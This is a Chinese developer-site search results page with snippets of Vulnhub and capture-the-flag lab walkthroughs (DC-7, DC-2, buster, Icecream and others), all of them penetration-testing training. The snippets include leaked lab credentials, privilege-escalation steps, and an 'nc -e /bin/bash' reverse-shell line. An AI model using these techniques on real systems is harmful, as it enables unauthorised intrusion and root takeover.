文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
    时间不限
    最近一周
    最近一月
    最近三月
  • 来自专栏渗透靶机

    Vulnhub靶机:DC-7

    arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.8后使用namp扫描靶机。 我记得dc1好像是Drupal 7吧。不管那么多直接用工具扫。居然才扫出来几个目录。一个个进去看一下。后缀.txt的文件既然是免责声明。我去那这样我就没思路了。 dc7user/MdR3xOgB7#dW网站登录不进去应该是shell用户了。好ssh成功登录进去了。那就老三套。拿加跑。有了上次翻车的经历mali我注意了一下。才那么一点点就又翻车了。 如果靶机是联网的话应该可以用命令安装但是我这个靶机是没联网的。PHP 8.x-1.1 版本 |Drupal.orgPHP文件地址。安装一下模块。安装成功后。启动一下php。

    50100编辑于 2025-01-13
  • 来自专栏靶机渗透

    靶机渗透DC-7

    CMS还是Drupal,msf几个模块都没成功,扫描后台也没扫描出什么有用的信息。应该还是在网站上。

    88320发布于 2020-04-20
  • 来自专栏网络安全自修室

    DC-7靶机渗透实战

    靶机介绍 这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。 靶机下载地址[1],需要更详细的资料可以参考文章1[2]、文章2[3]、文章3[4] 信息搜集 nmap开路 ? 开放了80http端口,访问一下: ? 根据作者提示: DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are. ? dc7user: MdR3xOgB7#dW 渗透实战 连上ssh后在dc7user的home目录下发现了gpg加密的website.sql文件和一个mbox邮件 ? 参考资料 [1] 靶机下载地址: http://www.five86.com/dc-7.html [2] 参考文章1: https://blog.csdn.net/weixin_44426869/article

    1.2K30发布于 2020-08-12
  • 来自专栏vulnhub DC 1-9

    VulnHub DC-7 靶机渗透测试笔记

    VulnHub DC-7 靶机渗透测试笔记靶机系列:DC Series | 难度:中等 | 核心漏洞:GitHub OSINT 信息泄露 + Drupal PHP Filter RCE + PATH 劫持提权 目录环境信息信息收集[漏洞利用权限提升总结️ 环境信息项目信息靶机地址192.168.168.170攻击机地址192.168.168.128(Kali Linux)目标 CMSDrupal 8提权方式 立足点获取(SSH 登录)尝试将泄露的凭据直接用于 SSH:ssh dc7user@192.168.168.170# 密码:MdR3xOgB7#dW登录成功! 权限提升7. PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gzchown dc7user:dc7user /home/dc7user " --root=/var/www/html登录后台:可以看看数据库(虽然没用):mysql -u db7user -p'yNv3Po00' -D d7dbSHOW DATABASES;USE d7db

    40710编辑于 2026-03-08
  • 来自专栏网络安全自修室

    每周打靶 | Vulnhub-DC7靶机渗透实战

    2 内容速览 0x00前言 这是网络安全自修室每周带星球小伙伴一起实战的第6台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知! 靶机可从Vulnhub平台免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标! 攻击机:Kali Linux 靶机环境:192.168.241.140 所用工具:NC | 中国蚁剑 0x01 知识点 drush命令使用 Drupal php模块手动安装 0x02 信息搜集 使用masscan ”,应该是接入点,然后百度搜索@DC7USER,发现一些网站代码 点击config.php发现用户名密码dc7user \ MdR3xOgB7#dW 综上信息搜集可以发现,该目标系统为Linux,开放 查看dc7user用户有哪些文件,在mbox文件里面发现一个可以利用的脚本,同时该内容15分钟定时会发过来 进入到/opt/scripts查看backups.sh文件 且该脚本是以root权限运行

    75520编辑于 2023-09-02
  • 来自专栏渗透云笔记

    靶机练习 | DC:2 靶机渗透练习

    Kn0sky ---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com (protocol 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54 :31:51:91 (ECDSA) |_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) MAC Address: 08:00 If you enjoyed this CTF, send me a tweet via @DCAU7.

    2.1K20发布于 2019-10-14
  • 来自专栏全栈程序员必看

    owasp靶机安装_靶机是什么

    owasp靶机应该是每个渗透入门乃至一些高手的一个试炼地之一,以下是我在靶机上搭建虚拟的方法。 1.虚拟机安装 在这里我用的是VMware14,靶机自然也是VM的。 百度云盘传送门【2c4j】 2.owasp靶机下载 下载链接 3.owasp靶机打开 在第二步链接打开之后,将会下载到一个文件 将其解压之后先放着,所放的盘建议有10G以上的内存。 注意看我圈起来的地方,靶机是基于Ubuntu的虚拟机,密码账号都在我圈的地方。 现在点击开启虚拟机就好了。 网络适配器的话就是NAT,为了安全尽量不要用桥接。

    1.1K10编辑于 2022-09-21
  • 来自专栏FreeBuf

    JIS-CTF靶机+Kioptrix靶机渗透

    前言 最近一直在down各种CTF靶机玩,本次分享的2个靶机因较基础,故合并成一篇文章发表,本文章仅为初学者练手学习使用,大神们勿喷,感谢各位大佬! JIS靶机以拿到5个flag为止,本文攻击的靶机为kioptrix level1 以拿到root权限为止。 靶机下载/搭建: 靶机1: https://pan.baidu.com/s/1kt9dMb423DZhIKXObfbwTw ? 靶机2: http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar ? 开始: JIS靶机全解: 探测网络, IP:192.168.1.135 ? 本次仅为完成获取靶机中全部flag为目的。 Kioptrix靶机过程 先获取靶机IP: 192.168.1.138 ? nmap开路: ?

    1.2K40发布于 2018-07-30
  • 来自专栏闪石星曜CyberSecurity

    靶机练习 | DC:2 靶机渗透练习

    ---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com (protocol 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54 :31:51:91 (ECDSA) |_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) MAC Address: 08:00 If you enjoyed this CTF, send me a tweet via @DCAU7.

    94120发布于 2019-10-14
  • 来自专栏靶机复现

    blogger靶机

    wordpress搭建的网站→发现一个插件漏洞任意文件上传→上传shell→python反弹shell→获取vagrant用户密码→登录用户发现可以执行所有命令→sudo su提权→成功获取flag 首先扫描网络获取靶机

    53810编辑于 2022-04-12
  • 来自专栏Ms08067安全实验室

    【Vulnhub靶机系列】Breach1.0(附靶机

    文章来源|MS08067 安全实验室 本文作者:大方子(Ms08067实验室核心成员) 文章最后附靶机下载地址和完整版PDF 然后我们访问下新的地址 http://192.168.110.140

    76030编辑于 2022-05-27
  • 来自专栏HACK学习

    渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

    前言 挺久没更新靶机渗透文章,近期抽点时间继续更新文章,为什么这篇要2个靶机写在一起哪?因为第一个靶机虽然被困了几天但是其实比较简单故就和另外一个前段时间玩的合并在一起发表了…. 靶机安装/下载 Blacklight靶机下载: https://pan.baidu.com/s/1n1A7UlgDUHL1RdmXN0CDPw DeRPnStiNK靶机下载: https://pan.baidu.com /s/1ayCZ17PHxFe71vbldjGW2w Blacklight靶机IP:172.16.24.92 DeRPnStiNK靶机IP:172.16.24.69 攻击者IP:172.16.24.31 且权限为root 该靶机完!是不是很简单…. 2.DeRPnStiNK靶机 老规矩! (注:此处的key.txt 必须要给足权限,否则无法登陆) 下一步拿flag flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb

    1.5K20发布于 2019-08-07
  • 来自专栏网络安全攻防

    XXE靶机实践

    靶机介绍Haboob团队根据https://www.exploit-db.com/docs/45374发表的论文"XML外部实体注入-解释和利用"制作了这个虚拟机以利用私有网络中的漏洞,我们希望你喜欢这个挑战 靶机攻防攻击主机这里我们使用Kali linux和Windows 11作为本次攻击主机:信息收集由于靶机和攻击者主机Kali处于同一网段,所以我们进行一次网段扫描探测,最终确定靶机IP地址为192.168.204.138nmap -sS 192.168.204.135/24在浏览器中访问靶机的80端口,发现只有一个apache服务启动随后我们进一步探测目标信息,使用dirsearch进行目录扫描dirsearch -u http 随后再次进行base64解码得到一大串数据信息随后保存以上解码后的文件并以php进行运行(需要低版本的PHP,建议PHP5),得到flag:SAFCSP{xxe_is_so_easy}文末小结本篇文章以XXE靶机为例对

    56810编辑于 2023-12-22
  • 来自专栏渗透靶机

    vulnyx靶机:Ober

    arp-scan -I eth0 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.56nmap 192.168.30.56 -A -O -p--A 进行全面扫描 后使用namp扫描靶机。开放22,80端口,8080端口。扫一下80和8080端口目录。 直接就结束了,但是我看到这个靶机还有一个用户。但是都直接拿到root了就没必要了。

    23300编辑于 2025-05-06
  • 来自专栏渗透靶机

    hackmyvm靶机:quoted

    arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.66后使用namp扫描靶机

    33600编辑于 2025-05-22
  • 来自专栏渗透靶机

    vulnyx靶机:Beginner

    arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.16后使用namp扫描靶机。 这个靶机突破口在UDP端口上,这个我确实没注意这个东西。nmap 192.168.30.16 -sUudp开放了68,69端口。69的tftp有漏洞。找到一个backup-config的文件。 这样就拿下root了后续其实整个靶机都在测试你拿密钥的能力。但是开始的那个tftp的其实是没想到。

    54400编辑于 2025-01-21
  • 来自专栏渗透靶机

    hackmyvm靶机:Icecream

    arp-scan -I eth1 -l -I 指定eth1这个网卡 -l 扫描出全部主机 我们知道靶机的IP地址在192.168.31.204后使用namp扫描靶机。 因为这个靶机的/usr/sbin/ums2net是提权点。所以我们要创建一个a.conf 写入3000 of=/etc/sudoers。 先开启它,在用echo传东西。 太难了这个靶机

    47000编辑于 2025-05-08
  • 来自专栏渗透靶机

    vulnyx靶机:First

    arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.11后使用namp扫描靶机

    25000编辑于 2025-01-16
  • 来自专栏E条咸鱼

    GoldenEye靶机渗透

    没意思没意思,太难了 按照老套路,上来先找到靶机IP地址,发现IP地址为 192.168.40.135 ? 开放了http服务,访问一下 ? 右键查看源代码,找到一个 .js文件 ? 很巧,16年以前的内核,可以用脏牛,wget到靶机 ? 但是在GCC编译的时候,发现了问题,靶机没有gcc ? 他说如果我们拿到了这个flag的话,一定要去 /006-final/xvf7-flag/这个目录看一下 ? 辣是真滴流批

    92820发布于 2020-08-17
  • 来自专栏渗透靶机

    hackmyvm靶机:buster

    arp-scan -I eth0 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.31.72后使用namp扫描靶机靶机echo 'nc -e /bin/bash 192.168.31.224 1234' > /tmp/run.shchmod +x /tmp/run.shecho 'tmp/run.sh' > a.txtkali 机mkdir tmpcd tmpecho ''>run.shcd ..python -m http.servernc -lvvp 1234靶机sudo gobuster -u http://192.168.31.224

    31900编辑于 2025-05-17
第 2 页第 3 页第 4 页第 5 页第 6 页第 7 页第 8 页第 9 页第 10 页第 11 页
点击加载更多

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号

领券